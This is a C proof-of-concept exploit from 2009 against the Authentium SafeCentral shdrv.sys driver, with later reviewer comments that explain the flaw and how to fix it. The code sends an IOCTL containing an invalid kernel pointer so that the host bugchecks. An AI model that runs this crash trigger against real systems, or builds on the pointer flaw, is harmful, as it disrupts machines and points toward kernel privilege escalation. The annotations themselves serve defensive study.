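/* safecentral-unharden.c
 *
 * Copyright (c) 2009 by
 *
 * Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM POC
 * by mu-b - Tue 1 Sep 2009
 *
 * - Tested on: shdrv.sys 2.0.0.128
 *
 * Compile: MinGW + -lntdll
 *
 * - this exploit is provided for educational purposes _only_. You are free
 *   to use this code in any way you wish provided you do not work for, or
 *   are associated in any way with Portcullis Computer Security Ltd.
 *
 * - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
 */

/*
 * Reviewer notes (defensive reading of this listing):
 *
 * - What the listing does: it opens the \\.\ShDev device, sends a single
 *   request through SAFECNTRL_IOCTL whose `result` field is the invalid
 *   address 0xDEADBEEF, and expects the machine to bugcheck (see the final
 *   message).  As written it is a crash trigger; it contains no payload.
 *
 * - Likely root cause (inferred from the request layout, not shown here):
 *   the driver appears to dereference the caller-supplied `result` pointer
 *   in kernel mode without validating it.  Confirm against the driver.
 *
 * - What a driver author should do: treat every pointer embedded in a
 *   request structure as untrusted.  Capture the structure once, then
 *   validate each embedded pointer with ProbeForRead/ProbeForWrite inside
 *   a structured exception handler before touching it, and restrict who
 *   may open the device object.
 *
 * - Triage hint: a bugcheck whose faulting module is shdrv.sys on hosts
 *   running the affected versions listed above is consistent with this
 *   class of defect.
 */

/* NOTE(review): the three header names were lost when this page was
   extracted; the ones below are reconstructed from the functions the
   listing calls - confirm against the original file.  */
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* Decoded with the standard CTL_CODE layout: device type 0x22
   (FILE_DEVICE_UNKNOWN), function 0x800, METHOD_NEITHER, FILE_READ_ACCESS.
   With METHOD_NEITHER the I/O manager hands the driver raw user-mode
   pointers, so all validation is the driver's responsibility.  */
#define SAFECNTRL_IOCTL   0x00226003

/* Request block passed as the IOCTL input buffer.  `args` and `result`
   are pointers nested inside the buffer, which the I/O manager never
   validates regardless of transfer method.  */
struct ioctl_req {
  DWORD action;
  DWORD *args;
  DWORD *result;
};

/*
 * Sends one request with an invalid `result` pointer to the ShDev device.
 *
 * Returns EXIT_SUCCESS if the request completed and the process is still
 * running (i.e. the host did not bugcheck), EXIT_FAILURE if any Win32 call
 * failed.  All handles opened here are closed on every exit path.
 */
int
main (int argc, char **argv)
{
  struct ioctl_req req;
  HANDLE hFile;
  OVERLAPPED olStruct;
  BOOL bResult;
  DWORD args[2], rlen;
  int status = EXIT_FAILURE;

  (void) argc;
  (void) argv;

  printf ("Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM PoC\n"
          "by: \n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
  fflush (stdout);

  /* Zeroed up front so the cleanup path can test olStruct.hEvent safely.  */
  memset (&olStruct, 0, sizeof olStruct);

  hFile = CreateFileA ("\\\\.\\ShDev", GENERIC_READ,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      /* The original printed the HANDLE itself with %d, which is a
         format/argument mismatch and always shows the sentinel value;
         report the actual Win32 error code instead.  */
      fprintf (stderr, "* CreateFileA failed, %lu\n",
               (unsigned long) GetLastError ());
      return (EXIT_FAILURE);
    }

  /* `args` is left uninitialised, exactly as in the original listing.  */
  memset (&req, 0, sizeof req);
  req.action = 8;
  req.args = args;
  req.result = (DWORD *) 0xDEADBEEF;   /* deliberately invalid address */

  olStruct.hEvent = CreateEventW (NULL, TRUE, FALSE, NULL);
  if (!olStruct.hEvent)
    {
      fprintf (stderr, "* CreateEventW failed\n");
      goto out;
    }

  bResult = DeviceIoControl (hFile, SAFECNTRL_IOCTL,
                             &req, sizeof req, NULL, 0, &rlen, &olStruct);
  if (!bResult)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      goto out;
    }

  bResult = GetOverlappedResult (hFile, &olStruct, &rlen, 1);
  if (!bResult)
    {
      fprintf (stderr, "* GetOverlappedResult failed\n");
      goto out;
    }

  /* Reaching this point means the host did not bugcheck.  */
  printf ("* hmmm, you didn't STOP the box?!?!\n");
  status = EXIT_SUCCESS;

out:
  /* The original leaked the event handle on every path and the device
     handle on every error path.  */
  if (olStruct.hEvent)
    CloseHandle (olStruct.hEvent);
  CloseHandle (hFile);

  return (status);
}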